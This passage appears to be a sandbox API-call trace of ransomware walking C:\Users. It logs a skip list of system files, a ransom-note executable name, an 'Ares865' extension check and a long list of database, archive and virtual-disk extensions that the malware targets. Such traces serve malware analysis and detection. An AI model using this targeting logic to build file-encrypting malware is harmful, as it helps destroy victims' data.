HALPmcxz") returned 20 [0039.378] lstrlenW (lpString="C:\\Users\\*") returned 10 [0039.378] lstrcpyW (in: lpString1=0x2cce412, lpString2="5p5NrGJn0jS HALPmcxz" | out: lpString1="5p5NrGJn0jS HALPmcxz") returned="5p5NrGJn0jS HALPmcxz" [0039.378] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7968 [0039.378] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x3c) returned 0x2e5f70 [0039.378] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7970 | out: ListHead=0x2e7710, ListEntry=0x2e7970) returned 0x2e7950 [0039.378] FindNextFileW (in: hFindFile=0x2c9b10, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0039.378] lstrcmpiW (lpString1="All Users", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.378] lstrcmpiW (lpString1="All Users", lpString2="aoldtz.exe") returned -1 [0039.379] lstrcmpiW (lpString1="All Users", lpString2=".") returned 1 [0039.379] lstrcmpiW (lpString1="All Users", lpString2="..") returned 1 [0039.379] lstrcmpiW (lpString1="All Users", lpString2="windows") returned -1 [0039.379] lstrcmpiW (lpString1="All Users", lpString2="bootmgr") returned -1 [0039.379] lstrcmpiW (lpString1="All Users", lpString2="temp") returned -1 [0039.379] lstrcmpiW (lpString1="All Users", lpString2="pagefile.sys") returned -1 [0039.379] lstrcmpiW (lpString1="All Users", lpString2="boot") returned -1 [0039.379] lstrcmpiW (lpString1="All Users", lpString2="ids.txt") returned -1 [0039.379] lstrcmpiW (lpString1="All Users", lpString2="ntuser.dat") returned -1 [0039.379] lstrcmpiW (lpString1="All Users", lpString2="perflogs") returned -1 [0039.379] lstrcmpiW (lpString1="All Users", lpString2="MSBuild") returned -1 [0039.379] lstrlenW (lpString="All Users") returned 9 [0039.379] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 29 [0039.379] lstrcpyW (in: lpString1=0x2cce412, lpString2="All Users" | out: lpString1="All Users") returned="All Users" [0039.379] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7988 [0039.379] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x26) returned 0x2ef860 [0039.379] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7990 | out: ListHead=0x2e7710, ListEntry=0x2e7990) returned 0x2e7970 [0039.379] FindNextFileW (in: hFindFile=0x2c9b10, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0039.379] lstrcmpiW (lpString1="Default", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.379] lstrcmpiW (lpString1="Default", lpString2="aoldtz.exe") returned 1 [0039.379] lstrcmpiW (lpString1="Default", lpString2=".") returned 1 [0039.379] lstrcmpiW (lpString1="Default", lpString2="..") returned 1 [0039.379] lstrcmpiW (lpString1="Default", lpString2="windows") returned -1 [0039.379] lstrcmpiW (lpString1="Default", lpString2="bootmgr") returned 1 [0039.379] lstrcmpiW (lpString1="Default", lpString2="temp") returned -1 [0039.379] lstrcmpiW (lpString1="Default", lpString2="pagefile.sys") returned -1 [0039.379] lstrcmpiW (lpString1="Default", lpString2="boot") returned 1 [0039.379] lstrcmpiW (lpString1="Default", lpString2="ids.txt") returned -1 [0039.379] lstrcmpiW (lpString1="Default", lpString2="ntuser.dat") returned -1 [0039.379] lstrcmpiW (lpString1="Default", lpString2="perflogs") returned -1 [0039.379] lstrcmpiW (lpString1="Default", lpString2="MSBuild") returned -1 [0039.379] lstrlenW (lpString="Default") returned 7 [0039.379] lstrlenW (lpString="C:\\Users\\All Users") returned 18 [0039.379] lstrcpyW (in: lpString1=0x2cce412, lpString2="Default" | out: lpString1="Default") returned="Default" [0039.379] SetFileAttributesW (lpFileName="C:\\Users\\Default", dwFileAttributes=0x12) returned 1 [0039.380] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79a8 [0039.380] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2ef890 [0039.380] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79b0 | out: ListHead=0x2e7710, ListEntry=0x2e79b0) returned 0x2e7990 [0039.380] FindNextFileW (in: hFindFile=0x2c9b10, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0039.380] lstrcmpiW (lpString1="Default User", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.380] lstrcmpiW (lpString1="Default User", lpString2="aoldtz.exe") returned 1 [0039.380] lstrcmpiW (lpString1="Default User", lpString2=".") returned 1 [0039.380] lstrcmpiW (lpString1="Default User", lpString2="..") returned 1 [0039.380] lstrcmpiW (lpString1="Default User", lpString2="windows") returned -1 [0039.380] lstrcmpiW (lpString1="Default User", lpString2="bootmgr") returned 1 [0039.380] lstrcmpiW (lpString1="Default User", lpString2="temp") returned -1 [0039.380] lstrcmpiW (lpString1="Default User", lpString2="pagefile.sys") returned -1 [0039.380] lstrcmpiW (lpString1="Default User", lpString2="boot") returned 1 [0039.380] lstrcmpiW (lpString1="Default User", lpString2="ids.txt") returned -1 [0039.380] lstrcmpiW (lpString1="Default User", lpString2="ntuser.dat") returned -1 [0039.380] lstrcmpiW (lpString1="Default User", lpString2="perflogs") returned -1 [0039.380] lstrcmpiW (lpString1="Default User", lpString2="MSBuild") returned -1 [0039.380] lstrlenW (lpString="Default User") returned 12 [0039.380] lstrlenW (lpString="C:\\Users\\Default") returned 16 [0039.380] lstrcpyW (in: lpString1=0x2cce412, lpString2="Default User" | out: lpString1="Default User") returned="Default User" [0039.380] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79c8 [0039.380] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x2c) returned 0x2ecfb0 [0039.380] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79d0 | out: ListHead=0x2e7710, ListEntry=0x2e79d0) returned 0x2e79b0 [0039.380] FindNextFileW (in: hFindFile=0x2c9b10, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0039.380] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.380] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0039.380] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0039.380] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0039.380] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0039.380] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0039.380] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0039.380] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0039.381] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0039.381] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0039.381] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0039.381] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0039.381] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0039.381] lstrlenW (lpString="desktop.ini") returned 11 [0039.381] lstrlenW (lpString="C:\\Users\\Default User") returned 21 [0039.381] lstrcpyW (in: lpString1=0x2cce412, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0039.381] lstrlenW (lpString="desktop.ini") returned 11 [0039.381] lstrlenW (lpString="Ares865") returned 7 [0039.381] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0039.381] lstrlenW (lpString=".dll") returned 4 [0039.381] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0039.381] lstrlenW (lpString=".lnk") returned 4 [0039.381] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0039.381] lstrlenW (lpString=".ini") returned 4 [0039.381] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0039.381] lstrlenW (lpString=".sys") returned 4 [0039.381] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0039.381] lstrlenW (lpString="desktop.ini") returned 11 [0039.381] lstrlenW (lpString="bak") returned 3 [0039.381] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0039.381] lstrlenW (lpString="ba_") returned 3 [0039.381] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0039.381] lstrlenW (lpString="dbb") returned 3 [0039.381] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0039.381] lstrlenW (lpString="vmdk") returned 4 [0039.381] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0039.381] lstrlenW (lpString="rar") returned 3 [0039.381] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0039.381] lstrlenW (lpString="zip") returned 3 [0039.381] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0039.381] lstrlenW (lpString="tgz") returned 3 [0039.381] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0039.381] lstrlenW (lpString="vbox") returned 4 [0039.381] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0039.381] lstrlenW (lpString="vdi") returned 3 [0039.381] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0039.381] lstrlenW (lpString="vhd") returned 3 [0039.381] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0039.382] lstrlenW (lpString="vhdx") returned 4 [0039.382] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0039.382] lstrlenW (lpString="avhd") returned 4 [0039.382] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0039.382] lstrlenW (lpString="db") returned 2 [0039.382] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0039.382] lstrlenW (lpString="db2") returned 3 [0039.382] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0039.382] lstrlenW (lpString="db3") returned 3 [0039.382] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0039.382] lstrlenW (lpString="dbf") returned 3 [0039.382] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0039.382] lstrlenW (lpString="mdf") returned 3 [0039.382] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0039.382] lstrlenW (lpString="mdb") returned 3 [0039.382] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0039.382] lstrlenW (lpString="sql") returned 3 [0039.382] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0039.382] lstrlenW (lpString="sqlite") returned 6 [0039.382] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0039.382] lstrlenW (lpString="sqlite3") returned 7 [0039.382] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0039.382] lstrlenW (lpString="sqlitedb") returned 8 [0039.382] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0039.382] lstrlenW (lpString="xml") returned 3 [0039.382] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0039.382] lstrlenW (lpString="$er") returned 3 [0039.382] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0039.382] lstrlenW (lpString="4dd") returned 3 [0039.382] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0039.382] lstrlenW (lpString="4dl") returned 3 [0039.382] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0039.382] lstrlenW (lpString="^^^") returned 3 [0039.382] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0039.382] lstrlenW (lpString="abs") returned 3 [0039.382] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0039.382] lstrlenW (lpString="abx") returned 3 [0039.382] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0039.382] lstrlenW (lpString="accdb") returned 5 [0039.383] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0039.383] lstrlenW (lpString="accdc") returned 5 [0039.383] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0039.383] lstrlenW (lpString="accde") returned 5 [0039.383] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0039.383] lstrlenW (lpString="accdr") returned 5 [0039.383] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0039.383] lstrlenW (lpString="accdt") returned 5 [0039.383] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0039.383] lstrlenW (lpString="accdw") returned 5 [0039.383] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0039.383] lstrlenW (lpString="accft") returned 5 [0039.383] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0039.383] lstrlenW (lpString="adb") returned 3 [0039.383] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0039.383] lstrlenW (lpString="adb") returned 3 [0039.383] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0039.383] lstrlenW (lpString="ade") returned 3 [0039.383] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0039.383] lstrlenW (lpString="adf") returned 3 [0039.383] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0039.383] lstrlenW (lpString="adn") returned 3 [0039.383] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0039.383] lstrlenW (lpString="adp") returned 3 [0039.383] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0039.383] lstrlenW (lpString="alf") returned 3 [0039.383] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0039.383] lstrlenW (lpString="ask") returned 3 [0039.383] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0039.383] lstrlenW (lpString="btr") returned 3 [0039.383] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0039.383] lstrlenW (lpString="cat") returned 3 [0039.383] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0039.383] lstrlenW (lpString="cdb") returned 3 [0039.383] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0039.383] lstrlenW (lpString="ckp") returned 3 [0039.383] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0039.383] lstrlenW (lpString="cma") returned 3 [0039.383] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0039.384] lstrlenW (lpString="cpd") returned 3 [0039.384] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0039.384] lstrlenW (lpString="dacpac") returned 6 [0039.384] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0039.384] lstrlenW (lpString="dad") returned 3 [0039.384] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0039.384] lstrlenW (lpString="dadiagrams") returned 10 [0039.384] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0039.384] lstrlenW (lpString="daschema") returned 8 [0039.384] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0039.384] lstrlenW (lpString="db-journal") returned 10 [0039.384] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0039.384] lstrlenW (lpString="db-shm") returned 6 [0039.384] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0039.384] lstrlenW (lpString="db-wal") returned 6 [0039.384] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0039.384] lstrlenW (lpString="dbc") returned 3 [0039.384] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0039.385] lstrlenW (lpString="dbs") returned 3 [0039.385] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0039.385] lstrlenW (lpString="dbt") returned 3 [0039.385] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0039.385] lstrlenW (lpString="dbv") returned 3 [0039.385] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0039.385] lstrlenW (lpString="dbx") returned 3 [0039.385] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0039.385] lstrlenW (lpString="dcb") returned 3 [0039.385] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0039.385] lstrlenW (lpString="dct") returned 3 [0039.385] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0039.385] lstrlenW (lpString="dcx") returned 3 [0039.385] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0039.385] lstrlenW (lpString="ddl") returned 3 [0039.385] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0039.385] lstrlenW (lpString="dlis") returned 4 [0039.385] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0039.385] lstrlenW (lpString="dp1") returned 3 [0039.385] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0039.385] lstrlenW (lpString="dqy") returned 3 [0039.385] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0039.385] lstrlenW (lpString="dsk") returned 3 [0039.385] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0039.385] lstrlenW (lpString="dsn") returned 3 [0039.385] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0039.385] lstrlenW (lpString="dtsx") returned 4 [0039.385] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0039.385] lstrlenW (lpString="dxl") returned 3 [0039.385] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0039.385] lstrlenW (lpString="eco") returned 3 [0039.385] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0039.385] lstrlenW (lpString="ecx") returned 3 [0039.385] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0039.385] lstrlenW (lpString="edb") returned 3 [0039.385] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0039.385] lstrlenW (lpString="epim") returned 4 [0039.385] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0039.386] lstrlenW (lpString="fcd") returned 3 [0039.386] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0039.386] lstrlenW (lpString="fdb") returned 3 [0039.386] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0039.386] lstrlenW (lpString="fic") returned 3 [0039.386] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0039.386] lstrlenW (lpString="flexolibrary") returned 12 [0039.386] lstrlenW (lpString="fm5") returned 3 [0039.386] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0039.386] lstrlenW (lpString="fmp") returned 3 [0039.386] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0039.386] lstrlenW (lpString="fmp12") returned 5 [0039.386] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0039.386] lstrlenW (lpString="fmpsl") returned 5 [0039.386] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0039.386] lstrlenW (lpString="fol") returned 3 [0039.386] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0039.386] lstrlenW (lpString="fp3") returned 3 [0039.386] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0039.386] lstrlenW (lpString="fp4") returned 3 [0039.386] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0039.386] lstrlenW (lpString="fp5") returned 3 [0039.386] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0039.386] lstrlenW (lpString="fp7") returned 3 [0039.386] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0039.386] lstrlenW (lpString="fpt") returned 3 [0039.386] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0039.386] lstrlenW (lpString="frm") returned 3 [0039.386] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0039.386] lstrlenW (lpString="gdb") returned 3 [0039.386] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0039.386] lstrlenW (lpString="gdb") returned 3 [0039.386] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0039.386] lstrlenW (lpString="grdb") returned 4 [0039.386] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0039.386] lstrlenW (lpString="gwi") returned 3 [0039.386] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0039.386] lstrlenW (lpString="hdb") returned 3 [0039.387] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0039.387] lstrlenW (lpString="his") returned 3 [0039.387] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0039.387] lstrlenW (lpString="ib") returned 2 [0039.387] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0039.387] lstrlenW (lpString="idb") returned 3 [0039.387] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0039.387] lstrlenW (lpString="ihx") returned 3 [0039.387] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0039.387] lstrlenW (lpString="itdb") returned 4 [0039.387] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0039.387] lstrlenW (lpString="itw") returned 3 [0039.387] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0039.387] lstrlenW (lpString="jet") returned 3 [0039.387] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0039.387] lstrlenW (lpString="jtx") returned 3 [0039.387] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0039.387] lstrlenW (lpString="kdb") returned 3 [0039.387] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0039.387] lstrlenW (lpString="kexi") returned 4 [0039.387] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0039.387] lstrlenW (lpString="kexic") returned 5 [0039.387] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0039.387] lstrlenW (lpString="kexis") returned 5 [0039.387] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0039.387] lstrlenW (lpString="lgc") returned 3 [0039.387] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0039.387] lstrlenW (lpString="lwx") returned 3 [0039.387] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0039.387] lstrlenW (lpString="maf") returned 3 [0039.387] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0039.387] lstrlenW (lpString="maq") returned 3 [0039.387] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0039.387] lstrlenW (lpString="mar") returned 3 [0039.387] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0039.387] lstrlenW (lpString="marshal") returned 7 [0039.387] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0039.388] lstrlenW (lpString="mas") returned 3 [0039.388] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0039.388] lstrlenW (lpString="mav") returned 3 [0039.388] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0039.388] lstrlenW (lpString="maw") returned 3 [0039.388] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0039.388] lstrlenW (lpString="mdbhtml") returned 7 [0039.388] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0039.388] lstrlenW (lpString="mdn") returned 3 [0039.388] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0039.388] lstrlenW (lpString="mdt") returned 3 [0039.388] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0039.388] lstrlenW (lpString="mfd") returned 3 [0039.388] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0039.388] lstrlenW (lpString="mpd") returned 3 [0039.388] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0039.388] lstrlenW (lpString="mrg") returned 3 [0039.388] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0039.388] lstrlenW (lpString="mud") returned 3 [0039.388] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0039.388] lstrlenW (lpString="mwb") returned 3 [0039.388] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0039.388] lstrlenW (lpString="myd") returned 3 [0039.388] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0039.388] lstrlenW (lpString="ndf") returned 3 [0039.388] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0039.388] lstrlenW (lpString="nnt") returned 3 [0039.388] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0039.388] lstrlenW (lpString="nrmlib") returned 6 [0039.388] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0039.388] lstrlenW (lpString="ns2") returned 3 [0039.388] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0039.388] lstrlenW (lpString="ns3") returned 3 [0039.388] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0039.388] lstrlenW (lpString="ns4") returned 3 [0039.388] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0039.388] lstrlenW (lpString="nsf") returned 3 [0039.388] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0039.389] lstrlenW (lpString="nv") returned 2 [0039.389] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0039.389] lstrlenW (lpString="nv2") returned 3 [0039.389] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0039.389] lstrlenW (lpString="nwdb") returned 4 [0039.389] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0039.389] lstrlenW (lpString="nyf") returned 3 [0039.389] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0039.389] lstrlenW (lpString="odb") returned 3 [0039.389] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0039.389] lstrlenW (lpString="odb") returned 3 [0039.389] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0039.389] lstrlenW (lpString="oqy") returned 3 [0039.389] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0039.389] lstrlenW (lpString="ora") returned 3 [0039.389] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0039.389] lstrlenW (lpString="orx") returned 3 [0039.389] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0039.389] lstrlenW (lpString="owc") returned 3 [0039.389] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0039.389] lstrlenW (lpString="p96") returned 3 [0039.389] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0039.389] lstrlenW (lpString="p97") returned 3 [0039.389] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0039.389] lstrlenW (lpString="pan") returned 3 [0039.389] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0039.389] lstrlenW (lpString="pdb") returned 3 [0039.389] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0039.389] lstrlenW (lpString="pdm") returned 3 [0039.389] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0039.389] lstrlenW (lpString="pnz") returned 3 [0039.389] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0039.389] lstrlenW (lpString="qry") returned 3 [0039.389] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0039.389] lstrlenW (lpString="qvd") returned 3 [0039.389] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0039.389] lstrlenW (lpString="rbf") returned 3 [0039.390] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0039.390] lstrlenW (lpString="rctd") returned 4 [0039.390] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0039.390] lstrlenW (lpString="rod") returned 3 [0039.390] lstrcmpiW 